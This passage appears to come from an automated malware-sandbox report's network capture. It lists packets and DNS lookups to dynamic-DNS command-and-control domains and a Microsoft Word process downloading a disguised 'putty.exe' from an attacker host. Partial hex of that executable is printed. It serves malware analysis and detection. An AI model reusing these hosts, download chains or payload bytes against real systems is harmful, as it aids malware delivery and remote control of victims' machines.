                                Aug 2, 2021 11:01:58.715612888 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.746573925 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.748172045 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.779210091 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.793143988 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.853698969 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.871200085 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.904303074 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.959255934 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:58.987638950 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:58.988085032 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.042356968 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.042848110 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.097708941 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.097910881 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.151364088 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.151614904 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.157438040 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.197288990 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.197460890 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.259622097 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.259804010 CEST491798234192.168.2.22203.159.80.186
                                Aug 2, 2021 11:01:59.286906004 CEST823449179203.159.80.186192.168.2.22
                                Aug 2, 2021 11:01:59.322577953 CEST | 8234 | 49179 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:01:59.370440006 CEST | 49179 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:01:59.419071913 CEST | 8234 | 49179 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:01:59.432636023 CEST | 49179 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:01:59.440684080 CEST | 8234 | 49179 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:01:59.440763950 CEST | 49179 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:03.578025103 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:03.607223988 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:03.607315063 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:03.607657909 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:03.681041002 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:03.681252003 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:03.710711002 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:03.711329937 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:03.790767908 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:03.919810057 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:03.962214947 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:03.990858078 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:04.221678019 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:04.251709938 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:04.252593994 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:04.282233000 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:04.283467054 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:04.315053940 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:04.518862009 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:07.072068930 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:07.353625059 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:08.651300907 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:08.902151108 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:08.947962046 CEST | 6703 | 49168 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:09.198595047 CEST | 49168 | 6703 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:11.852711916 CEST | 49168 | 6703 | 192.168.2.22 | 203.159.80.186
                                Aug 2, 2021 11:02:12.025379896 CEST | 6703 | 49168 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:13.688009024 CEST | 8234 | 49180 | 203.159.80.186 | 192.168.2.22
                                Aug 2, 2021 11:02:13.894656897 CEST | 49180 | 8234 | 192.168.2.22 | 203.159.80.186

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Aug 2, 2021 10:59:54.123145103 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 10:59:54.167108059 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 10:59:57.598957062 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 10:59:57.642354965 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 10:59:58.563791037 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 10:59:58.599704981 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:00:28.612422943 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:00:28.667654037 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:00:29.524005890 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:00:29.556768894 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:00:29.557904005 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:00:29.590831041 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:00:55.130738020 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:00:55.262723923 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:00:55.263684988 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:00:55.298891068 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:00:55.299585104 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:00:55.334811926 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:03.769011974 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:03.900093079 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:03.945925951 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:03.978482962 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:03.992775917 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:04.025501013 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:10.201478958 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:10.237142086 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:15.511684895 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:15.549159050 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:15.592659950 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:15.629231930 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:15.686260939 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:15.724112988 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:26.042512894 CEST | 52496 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:26.079297066 CEST | 53 | 52496 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:26.163316965 CEST | 52496 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:26.191297054 CEST | 53 | 52496 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:31.131093025 CEST | 57564 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:31.158580065 CEST | 53 | 57564 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:36.336036921 CEST | 63009 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:36.371905088 CEST | 53 | 63009 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:41.617649078 CEST | 59319 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:41.650404930 CEST | 53 | 59319 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:52.811868906 CEST | 53070 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:52.841140032 CEST | 53 | 53070 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:01:58.229518890 CEST | 59770 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:01:58.264827013 CEST | 53 | 59770 | 8.8.8.8 | 192.168.2.22
                                Aug 2, 2021 11:02:03.448385954 CEST | 61523 | 53 | 192.168.2.22 | 8.8.8.8
                                Aug 2, 2021 11:02:03.577531099 CEST | 53 | 61523 | 8.8.8.8 | 192.168.2.22

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Aug 2, 2021 10:59:54.123145103 CEST | 192.168.2.22 | 8.8.8.8 | 0x6029 | Standard query (0) | newhosteeeee.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:57.598957062 CEST | 192.168.2.22 | 8.8.8.8 | 0xe5d1 | Standard query (0) | newhosteeeee.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:58.563791037 CEST | 192.168.2.22 | 8.8.8.8 | 0x5ccc | Standard query (0) | newhosteeeee.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:28.612422943 CEST | 192.168.2.22 | 8.8.8.8 | 0xe21 | Standard query (0) | sdafsdffssffs.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.524005890 CEST | 192.168.2.22 | 8.8.8.8 | 0xe89a | Standard query (0) | hutyrtit.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.557904005 CEST | 192.168.2.22 | 8.8.8.8 | 0xe89a | Standard query (0) | hutyrtit.ydns.eu | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.130738020 CEST | 192.168.2.22 | 8.8.8.8 | 0x27e1 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.263684988 CEST | 192.168.2.22 | 8.8.8.8 | 0x27e1 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.299585104 CEST | 192.168.2.22 | 8.8.8.8 | 0x27e1 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.769011974 CEST | 192.168.2.22 | 8.8.8.8 | 0x566a | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.945925951 CEST | 192.168.2.22 | 8.8.8.8 | 0x566a | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.992775917 CEST | 192.168.2.22 | 8.8.8.8 | 0x566a | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:10.201478958 CEST | 192.168.2.22 | 8.8.8.8 | 0x12eb | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.511684895 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc8c | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.592659950 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc8c | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.686260939 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc8c | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.042512894 CEST | 192.168.2.22 | 8.8.8.8 | 0x5b8f | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.163316965 CEST | 192.168.2.22 | 8.8.8.8 | 0x5b8f | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:31.131093025 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6e4 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:36.336036921 CEST | 192.168.2.22 | 8.8.8.8 | 0x7ae6 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:41.617649078 CEST | 192.168.2.22 | 8.8.8.8 | 0xe8bf | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:52.811868906 CEST | 192.168.2.22 | 8.8.8.8 | 0xd6d2 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:58.229518890 CEST | 192.168.2.22 | 8.8.8.8 | 0x4853 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:02:03.448385954 CEST | 192.168.2.22 | 8.8.8.8 | 0xf096 | Standard query (0) | hhjhtggfr.duckdns.org | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Aug 2, 2021 10:59:54.167108059 CEST | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | newhosteeeee.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:57.642354965 CEST | 8.8.8.8 | 192.168.2.22 | 0xe5d1 | No error (0) | newhosteeeee.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 10:59:58.599704981 CEST | 8.8.8.8 | 192.168.2.22 | 0x5ccc | No error (0) | newhosteeeee.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:28.667654037 CEST | 8.8.8.8 | 192.168.2.22 | 0xe21 | No error (0) | sdafsdffssffs.ydns.eu |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.556768894 CEST | 8.8.8.8 | 192.168.2.22 | 0xe89a | No error (0) | hutyrtit.ydns.eu |  | 203.159.80.165 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:29.590831041 CEST | 8.8.8.8 | 192.168.2.22 | 0xe89a | No error (0) | hutyrtit.ydns.eu |  | 203.159.80.165 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.262723923 CEST | 8.8.8.8 | 192.168.2.22 | 0x27e1 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.298891068 CEST | 8.8.8.8 | 192.168.2.22 | 0x27e1 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:00:55.334811926 CEST | 8.8.8.8 | 192.168.2.22 | 0x27e1 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.900093079 CEST | 8.8.8.8 | 192.168.2.22 | 0x566a | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:03.978482962 CEST | 8.8.8.8 | 192.168.2.22 | 0x566a | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:04.025501013 CEST | 8.8.8.8 | 192.168.2.22 | 0x566a | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:10.237142086 CEST | 8.8.8.8 | 192.168.2.22 | 0x12eb | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.549159050 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc8c | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.629231930 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc8c | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:15.724112988 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc8c | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.079297066 CEST | 8.8.8.8 | 192.168.2.22 | 0x5b8f | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:26.191297054 CEST | 8.8.8.8 | 192.168.2.22 | 0x5b8f | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:31.158580065 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6e4 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:36.371905088 CEST | 8.8.8.8 | 192.168.2.22 | 0x7ae6 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:41.650404930 CEST | 8.8.8.8 | 192.168.2.22 | 0xe8bf | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:52.841140032 CEST | 8.8.8.8 | 192.168.2.22 | 0xd6d2 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:01:58.264827013 CEST | 8.8.8.8 | 192.168.2.22 | 0x4853 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)
                                Aug 2, 2021 11:02:03.577531099 CEST | 8.8.8.8 | 192.168.2.22 | 0xf096 | No error (0) | hhjhtggfr.duckdns.org |  | 203.159.80.186 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • newhosteeeee.ydns.eu
                                • hutyrtit.ydns.eu

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.22 | 49165 | 203.159.80.186 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Timestamp | kBytes transferred | Direction | Data
                                Aug 2, 2021 10:59:54.220050097 CEST | 0 | OUT | GET /putty.exe HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:54.251251936 CEST | 2 | IN | HTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:54 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 
aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets
                                Aug 2, 2021 10:59:54.251281023 CEST | 3 | IN | Data Raw: 46 00 00 0a 28 44 00 00 0a 80 0a 00 00 04 2a 1e 02 28 47 00 00 0a 2a 00 13 30 01 00 1d 00 00 00 09 00 00 11 00 28 07 00 00 06 6f 48 00 00 0a 0a 06 2c 0c 28 13 00 00 06 6f 49 00 00 0a 00 00 00 2a 00 00 00 1b 30 03 00 65 00 00 00 0a 00 00 11 00 7e
                                Data Ascii: F(D*(G*0(oH,(oI*0e~,M~(J(K~,(sLoM(N~+*"-O0(+*(F*&}*
                                Aug 2, 2021 10:59:54.251302004 CEST | 4 | IN | Data Raw: 61 00 00 0a 00 02 6f 2c 00 00 06 1a 6f 62 00 00 0a 00 02 6f 2c 00 00 06 72 39 01 00 70 6f 63 00 00 0a 00 02 6f 2e 00 00 06 1f 78 1f 5e 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 6f 2e 00 00 06 72 45 01 00 70 6f 5f 00 00 0a 00 02 6f 2e 00 00 06 20 a8 00
                                Data Ascii: ao,obo,r9poco.x^s[o\o.rEpo_o. s`oao.obo0oXo0rop"AsYoZo0ds[o\o0s]o^o0rWpo_o0*s`oao0ob
                                Aug 2, 2021 10:59:54.251323938 CEST | 6 | IN | Data Raw: 6f 32 00 00 06 6f 73 00 00 0a 00 2a 13 30 03 00 5c 00 00 00 09 00 00 11 00 02 6f 24 00 00 06 6f 74 00 00 0a 6f 75 00 00 0a 16 fe 01 0a 06 2c 22 04 17 6f 76 00 00 0a 00 02 6f 36 00 00 06 02 6f 24 00 00 06 72 c5 01 00 70 6f 77 00 00 0a 00 00 2b 21
                                Data Ascii: o2os*0\o$otou,"ovo6o$rpow+!ovo6o$rpow*0\o*otou,"ovo6o*rpow+!ovo6o*rpow*0\o.ot
                                Aug 2, 2021 10:59:54.282464981 CEST | 7 | IN | Data Raw: 00 02 28 88 00 00 0a 00 00 00 2a 00 00 00 13 30 01 00 0c 00 00 00 14 00 00 11 00 02 7b 20 00 00 04 0a 2b 00 06 2a 13 30 02 00 55 00 00 00 15 00 00 11 00 03 1f 18 fe 04 0a 06 2c 04 1f 18 10 01 03 20 2c 01 00 00 fe 02 0b 07 2c 07 20 2c 01 00 00 10
                                Data Ascii: (*0{ +*0U, ,, ,{ ,"} {}(X(*0{!+*0M,,{!,"}!{}(X(
                                Aug 2, 2021 10:59:54.282495975 CEST | 9 | IN | Data Raw: 00 0a 02 28 6a 00 00 0a 6f 86 00 00 0a 17 da 6f 87 00 00 0a 74 36 00 00 01 6f 9d 00 00 0a 00 2a 13 30 02 00 37 00 00 00 18 00 00 11 00 02 7b 1d 00 00 04 0a 17 0b 2b 0b 02 28 57 00 00 06 00 07 17 d6 0b 07 06 31 f1 02 7b 1e 00 00 04 0c 17 0d 2b 0c
